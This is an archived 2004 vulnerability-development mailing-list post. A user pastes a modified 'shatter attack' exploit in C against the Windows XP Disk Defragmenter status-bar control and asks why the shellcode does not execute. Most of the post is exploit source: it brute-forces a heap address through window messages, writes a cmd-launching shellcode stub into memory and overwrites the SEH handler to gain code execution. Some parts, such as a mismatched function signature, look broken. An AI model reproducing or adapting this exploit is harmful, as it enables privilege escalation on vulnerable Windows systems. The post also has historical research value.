Vulnerability Development mailing list archives
status-bar SHATTER attack
From: "bil_912" <bil_912 () coolgoose com>
Date: Thu, 8 Jul 2004 03:59:38 +0600
hello all, recently i was playing with >> STATUS-BAR <<
shatter-attack-code provided
by brett.moore () security-assessment com the code with tiny modifications is attached here. the problem is ... xp.sp1 TOP SEH at 0x77ed73b4 was getting overwritten as 0x77ed74c0 where my
shellcode is residing. but even after that the code didnt get executed. i was attacking the "disk defragmenter" utility which come with windows XP. can anyone pls point me where i'm wrong ?? thank u. [ i'm attaching a screen-shot of my desktop when attacking ] //=========================================================================
/******************************************************************************* ******
* Statusbar Control Shatter exploit * * Demonstrates the use of a combination of windows messages to; * - brute force a useable heap address * - place structure information inside a process * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 4 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * - heapaddr is the base heap address to start brute forcing * * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues * Try it out against any program with a progress bar *
******************************************************************************** *****/
#include <windows.h> #include <commctrl.h> #include <stdio.h> // Local No Null Cmd Shellcode. BYTE exploit[]
="\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";
char g_classNameBuf[ 256 ]; char tWindow[]="disk defragmenter"; long sehHandler = 0x77ed73b4; // Critical Address To Overwrite long shellcodeaddr = 0x77ed74c0; // Known Writeable Space Or Global Space unsigned long heapaddr = 0x00100000; // Base Heap Address long mainhWnd; void doWrite(HWND hWnd, long tByte,long address); void BruteForceHeap(HWND hWnd); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { HMODULE hMod; DWORD ProcAddr; long x; //making the shellcode ready hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) *(long *)&exploit[8] = ProcAddr; //*************************** //printf("+ Enter Window Title\n",tWindow); //flushall(); //gets(tWindow); if (argc == 2) sscanf(argv[1],"%lx",&heapaddr);// Oddity printf("%% Using base heap address...0x%xh\n",heapaddr); printf("+ Finding %s Window...\n",tWindow); mainhWnd = (long)FindWindow(NULL,tWindow); if(mainhWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At......0x%xh\n",mainhWnd); IterateWindows(mainhWnd); printf("+ Done...\n"); return 0; } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); } GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) ); if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0) { // Find Heap Address BruteForceHeap((HWND) hWnd); //printf("+ Enter heapaddr : \n"); //scanf("%lx",&heapaddr); // Inject shellcode to known address printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exploit);looper++) doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); getch(); SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); //PROGRESSS_BAR SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1); printf("+ Done...\n"); exit(0); } } void BruteForceHeap(HWND hWnd, long tByte,long address) { long retval; BOOL foundHeap = FALSE; char buffer[5000]; memset(buffer,0,sizeof(buffer)); while (!foundHeap) { printf("+ Trying Heap Address.......0x%xh ",heapaddr); memset(buffer,0x58,sizeof(buffer)-1); // settin to X // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Part Contents SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr); retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0); printf("%d",retval); if(retval == 1) { // First Retval should be 1 memset(buffer,0x80,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Part Contents SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr); retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0); if(retval > 1) { // Second should be larger than 1 printf(" : %d - Found Heap Address : 0x%x\n",retval,heapaddr); return(0); } } printf("\n"); heapaddr += 2500; } } void doWrite(HWND hWnd, long tByte,long address) { char buffer[5000]; memset(buffer,0,sizeof(buffer)); memset(buffer,tByte,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Statusbar width SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr); SendMessage( hWnd,(UINT) SB_GETPARTS,1,address); } //=========================================================================
Current thread:
- status-bar SHATTER attack bil_912 (Jul 07)
- RE: status-bar SHATTER attack Brett Moore (Jul 08)